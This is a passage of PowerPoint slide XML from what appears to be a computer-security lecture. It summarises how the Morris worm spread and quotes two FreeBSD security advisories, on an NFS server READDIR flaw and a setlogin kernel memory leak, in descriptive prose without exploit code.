              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>assword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>guessing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>assword dictionary</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>forward</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="361950" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="361950" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Detailed how the worm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1800" dirty="0"/>
              <a:t>did it: https://snowplow.org/tom/worm/worm.html</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"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6</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108047519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323850" y="692150"/>
            <a:ext cx="8229600" cy="792163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>FreeBSD-SA-13:05.nfsserver </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77828" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="361950" y="1468438"/>
            <a:ext cx="6019800" cy="4994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cs-CZ" sz="1400" b="1" dirty="0"/>
              <a:t>II.  Problem Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>When processing READDIR requests, the NFS server does not check that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>it is in fact operating on a directory node.  An attacker can use a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" b="1" dirty="0"/>
              <a:t>specially modified NFS client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t> to submit a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" b="1" dirty="0"/>
              <a:t>READDIR request on a file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>causing the underlying filesystem to interpret that file as a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" b="1" dirty="0"/>
              <a:t>III. Impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>The exact consequences of an attack depend on the amount of input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>validation in the underlying filesystem:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t> - If the file resides on a UFS filesystem on a little-endian server,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>   an attacker can cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" b="1" dirty="0"/>
              <a:t>random heap corruption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t> with completely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>   unpredictable consequences.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t> - If the file resides on a ZFS filesystem, an attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" b="1" dirty="0"/>
              <a:t>can write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" b="1" dirty="0"/>
              <a:t>   arbitrary data on the stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>.  It is believed, but has not been</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>   confirmed, that this can be exploited to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" b="1" dirty="0"/>
              <a:t>run arbitrary code in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" b="1" dirty="0"/>
              <a:t>   kernel context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>Other filesystems may also be vulnerable.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1400"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60</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="836613"/>
            <a:ext cx="8229600" cy="792162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>One last example</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="1628775"/>
            <a:ext cx="8229600" cy="4149725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>FreeBSD-SA-14:25.setlogin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>Unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> buffer, attacker can read kernel memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119812" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="590550" y="2636838"/>
            <a:ext cx="8229600" cy="15621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cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>When</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>setlogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>called</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>setting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> up a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> session, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>copied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>uninitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>copied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>structure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>getlogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>returns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>entire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>rather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>than</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>portion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>occupied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>associated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> session. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>An</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>unprivileged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>calling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>getlogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>(2) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>reading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>beyond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>terminating</a:t>
            </a:r>
            <a:r>
